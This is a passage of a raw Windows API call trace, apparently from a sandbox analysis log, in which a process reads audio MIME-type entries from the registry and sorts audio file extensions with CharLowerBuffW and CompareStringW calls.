lpcbData=0x19fc20*=0xa) returned 0x0 [0104.846] CharLowerBuffW (in: lpsz=".3g2", cchLength=0x4 | out: lpsz=".3g2") returned 0x4 [0104.846] CharLowerBuffW (in: lpsz="audio/3gpp2", cchLength=0xb | out: lpsz="audio/3gpp2") returned 0xb [0104.846] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.846] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/aac", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.847] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.847] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".aac", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.848] CharLowerBuffW (in: lpsz=".aac", cchLength=0x4 | out: lpsz=".aac") returned 0x4 [0104.848] CharLowerBuffW (in: lpsz="audio/aac", cchLength=0x9 | out: lpsz="audio/aac") returned 0x9 [0104.848] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.848] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/aiff", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.849] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.849] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".aiff", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.849] CharLowerBuffW (in: lpsz=".aiff", cchLength=0x5 | out: lpsz=".aiff") returned 0x5 [0104.849] CharLowerBuffW (in: lpsz="audio/aiff", cchLength=0xa | out: lpsz="audio/aiff") returned 0xa [0104.849] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.849] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/amr", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.849] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.850] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".amr", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.850] CharLowerBuffW (in: lpsz=".amr", cchLength=0x4 | out: lpsz=".amr") returned 0x4 [0104.850] CharLowerBuffW (in: lpsz="audio/amr", cchLength=0x9 | out: lpsz="audio/amr") returned 0x9 [0104.851] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.851] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/basic", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.943] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x8) returned 0x0 [0104.943] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0x8 | out: lpType=0x19fc10*=0x1, lpData=".au", lpcbData=0x19fc20*=0x8) returned 0x0 [0104.944] CharLowerBuffW (in: lpsz=".au", cchLength=0x3 | out: lpsz=".au") returned 0x3 [0104.944] CharLowerBuffW (in: lpsz="audio/basic", cchLength=0xb | out: lpsz="audio/basic") returned 0xb [0104.944] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.944] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/ec3", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.945] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.946] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".ec3", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.946] CharLowerBuffW (in: lpsz=".ec3", cchLength=0x4 | out: lpsz=".ec3") returned 0x4 [0104.946] CharLowerBuffW (in: lpsz="audio/ec3", cchLength=0x9 | out: lpsz="audio/ec3") returned 0x9 [0104.946] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.946] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/l16", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.947] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.947] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".lpcm", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.947] CharLowerBuffW (in: lpsz=".lpcm", cchLength=0x5 | out: lpsz=".lpcm") returned 0x5 [0104.947] CharLowerBuffW (in: lpsz="audio/l16", cchLength=0x9 | out: lpsz="audio/l16") returned 0x9 [0104.947] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.947] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/mid", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.949] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.949] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".mid", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.950] CharLowerBuffW (in: lpsz=".mid", cchLength=0x4 | out: lpsz=".mid") returned 0x4 [0104.950] CharLowerBuffW (in: lpsz="audio/mid", cchLength=0x9 | out: lpsz="audio/mid") returned 0x9 [0104.950] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.950] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/midi", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.951] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.951] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".mid", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.951] CharLowerBuffW (in: lpsz=".mid", cchLength=0x4 | out: lpsz=".mid") returned 0x4 [0104.951] CharLowerBuffW (in: lpsz="audio/midi", cchLength=0xa | out: lpsz="audio/midi") returned 0xa [0104.951] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.951] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/mp3", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.951] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.952] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".mp3", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.952] CharLowerBuffW (in: lpsz=".mp3", cchLength=0x4 | out: lpsz=".mp3") returned 0x4 [0104.952] CharLowerBuffW (in: lpsz="audio/mp3", cchLength=0x9 | out: lpsz="audio/mp3") returned 0x9 [0104.953] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.953] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/mp4", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.953] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.954] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".m4a", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.954] CharLowerBuffW (in: lpsz=".m4a", cchLength=0x4 | out: lpsz=".m4a") returned 0x4 [0104.955] CharLowerBuffW (in: lpsz="audio/mp4", cchLength=0x9 | out: lpsz="audio/mp4") returned 0x9 [0104.955] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.955] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/MP4A-LATM", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.955] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.955] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".m4a", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.956] CharLowerBuffW (in: lpsz=".m4a", cchLength=0x4 | out: lpsz=".m4a") returned 0x4 [0104.956] CharLowerBuffW (in: lpsz="audio/MP4A-LATM", cchLength=0xf | out: lpsz="audio/mp4a-latm") returned 0xf [0104.956] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.956] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/mpeg", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.957] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.957] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".mp3", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.958] CharLowerBuffW (in: lpsz=".mp3", cchLength=0x4 | out: lpsz=".mp3") returned 0x4 [0104.958] CharLowerBuffW (in: lpsz="audio/mpeg", cchLength=0xa | out: lpsz="audio/mpeg") returned 0xa [0104.958] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.958] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/mpegurl", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.959] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.959] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a0c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".m3u", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.960] CharLowerBuffW (in: lpsz=".m3u", cchLength=0x4 | out: lpsz=".m3u") returned 0x4 [0104.960] CharLowerBuffW (in: lpsz="audio/mpegurl", cchLength=0xd | out: lpsz="audio/mpegurl") returned 0xd [0104.960] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.960] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/mpg", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.960] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.961] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a2c, lpcbData=0x19fc20*=0xa | out: lpType=0x19fc10*=0x1, lpData=".mp3", lpcbData=0x19fc20*=0xa) returned 0x0 [0104.961] CharLowerBuffW (in: lpsz=".mp3", cchLength=0x4 | out: lpsz=".mp3") returned 0x4 [0104.961] CharLowerBuffW (in: lpsz="audio/mpg", cchLength=0x9 | out: lpsz="audio/mpg") returned 0x9 [0104.961] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.961] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/vnd.dlna.adts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.961] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xc) returned 0x0 [0104.962] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fc10, lpData=0x2480a4c, lpcbData=0x19fc20*=0xc | out: lpType=0x19fc10*=0x1, lpData=".adts", lpcbData=0x19fc20*=0xc) returned 0x0 [0104.962] CharLowerBuffW (in: lpsz=".adts", cchLength=0x5 | out: lpsz=".adts") returned 0x5 [0104.962] CharLowerBuffW (in: lpsz="audio/vnd.dlna.adts", cchLength=0x13 | out: lpsz="audio/vnd.dlna.adts") returned 0x13 [0104.962] RegCloseKey (hKey=0x3f2) returned 0x0 [0104.962] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="MIME\\Database\\Content Type\\audio/vnd.dolby.dd-raw", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0104.963] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Extension", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0xa) returned 0x0 [0104.964] CharLowerBuffW (in: lpsz=".ac3", cchLength=0x4 | out: lpsz=".ac3") returned 0x4 [0104.964] CharLowerBuffW (in: lpsz="audio/vnd.dolby.dd-raw", cchLength=0x16 | out: lpsz="audio/vnd.dolby.dd-raw") returned 0x16 [0104.965] CharLowerBuffW (in: lpsz=".wav", cchLength=0x4 | out: lpsz=".wav") returned 0x4 [0104.965] CharLowerBuffW (in: lpsz="audio/wav", cchLength=0x9 | out: lpsz="audio/wav") returned 0x9 [0104.965] CharLowerBuffW (in: lpsz=".aiff", cchLength=0x5 | out: lpsz=".aiff") returned 0x5 [0104.965] CharLowerBuffW (in: lpsz="audio/x-aiff", cchLength=0xc | out: lpsz="audio/x-aiff") returned 0xc [0104.966] CharLowerBuffW (in: lpsz=".flac", cchLength=0x5 | out: lpsz=".flac") returned 0x5 [0105.073] GetCurrentThreadId () returned 0x1358 [0105.073] GetCurrentThreadId () returned 0x1358 [0105.073] GetCurrentThreadId () returned 0x1358 [0105.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".aac", cchCount2=4) returned 3 [0105.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".aif", cchCount2=4) returned 3 [0105.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".aif", cchCount2=4) returned 1 [0105.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aifc", cchCount1=5, lpString2=".aiff", cchCount2=5) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".gsm", cchCount2=4) returned 3 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".gsm", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".gsm", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".kar", cchCount2=4) returned 3 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".kar", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".kar", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".kar", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 3 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".m4a", cchCount2=4) returned 3 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".m4a", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".m4a", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".m4a", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".m4a", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".m4a", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".mid", cchCount2=4) returned 3 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".mid", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".mid", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".mid", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".mid", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".mid", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".mid", cchCount2=4) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aifc", cchCount1=5, lpString2=".midi", cchCount2=5) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aiff", cchCount1=5, lpString2=".midi", cchCount2=5) returned 1 [0105.074] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".mp2", cchCount2=4) returned 3 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".mp2", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".mp2", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".mp2", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".mp2", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".mp2", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".mp2", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".mp2", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 3 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".mp3", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aifc", cchCount1=5, lpString2=".mpga", cchCount2=5) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aiff", cchCount1=5, lpString2=".mpga", cchCount2=5) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".midi", cchCount1=5, lpString2=".mpga", cchCount2=5) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 3 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".m3u", cchCount2=4) returned 2 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".pls", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nml", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aac", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gsm", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kar", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m3u", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mid", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp2", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pls", cchCount1=4, lpString2=".qcp", cchCount2=4) returned 1 [0105.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".au", cchCount1=3, lpString2=".ra", 